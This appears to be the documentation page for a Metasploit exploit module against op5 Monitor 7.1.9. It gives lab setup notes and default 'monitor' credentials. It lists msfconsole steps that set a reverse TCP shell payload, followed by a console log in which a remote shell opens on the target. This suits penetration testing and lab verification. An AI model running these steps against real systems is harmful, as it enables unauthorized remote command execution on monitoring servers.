## Vulnerable Application

  Official Source: [op5.com](https://www.op5.com/blog/wpfb-file/op5-monitor-7-1-9-20160303-tar-gz/)
  Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)

### Creating A Testing Environment

Just a few quick notes on setting up a vulnerable lab with this software.

  1. The vulnerable version only installs on CentOS 6.x (author used 6.0 final)
  2. Within `php.ini`, `date.timezone = "America/New York"` to `date.timezone = "America/New_York"` if you get php errors
  3. You may need to register for a free license via an email challenge/verification

## Verification Steps

  1. Install the software, RHEL/CENTOS required (tested on CentOS 6)
  2. Start msfconsole
  3. Do: ```use exploit/linux/http/op5_config_exec```
  4. Do: ```set payload linux/x86/shell/reverse_tcp```
  5. Do: ```set rhost 192.168.2.31```
  6. Do: ```set lhost 192.168.2.229```
  7. Do: ```exploit```
  8. You should get a shell.

## Options

### PASSWORD

  Password is 'monitor' by default.

### USERNAME

  Documentation was unclear on this.  Installing just the app, the
  username was 'monitor' by default.  However it looks like if you
  install the appliance it may be 'root'

## Scenarios

  ```
    msf > use exploit/linux/http/op5_config_exec 
    msf exploit(op5_config_exec) > set verbose true
    verbose => true
    msf exploit(op5_config_exec) > set payload linux/x86/shell/reverse_tcp
    payload => linux/x86/shell/reverse_tcp
    msf exploit(op5_config_exec) > set rhost 192.168.2.31
    rhost => 192.168.2.31
    msf exploit(op5_config_exec) > set lhost 192.168.2.229
    lhost => 192.168.2.229
    msf exploit(op5_config_exec) > check
    
    [+] Version Detected: 7.1.9
    [+] The target is vulnerable.
    msf exploit(op5_config_exec) > exploit
    
    [*] Started reverse TCP handler on 192.168.2.229:4444 
    [*] Sending stage (36 bytes) to 192.168.2.31
    [*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.31:52552) at 2016-06-01 14:38:41 -0400
    [*] Command Stager progress - 100.00% done (832/832 bytes)
    whoami
    monitor
    id
    uid=299(monitor) gid=48(apache) groups=48(apache),14(uucp),488(smstools) context=system_u:system_r:initrc_t:s0
  ```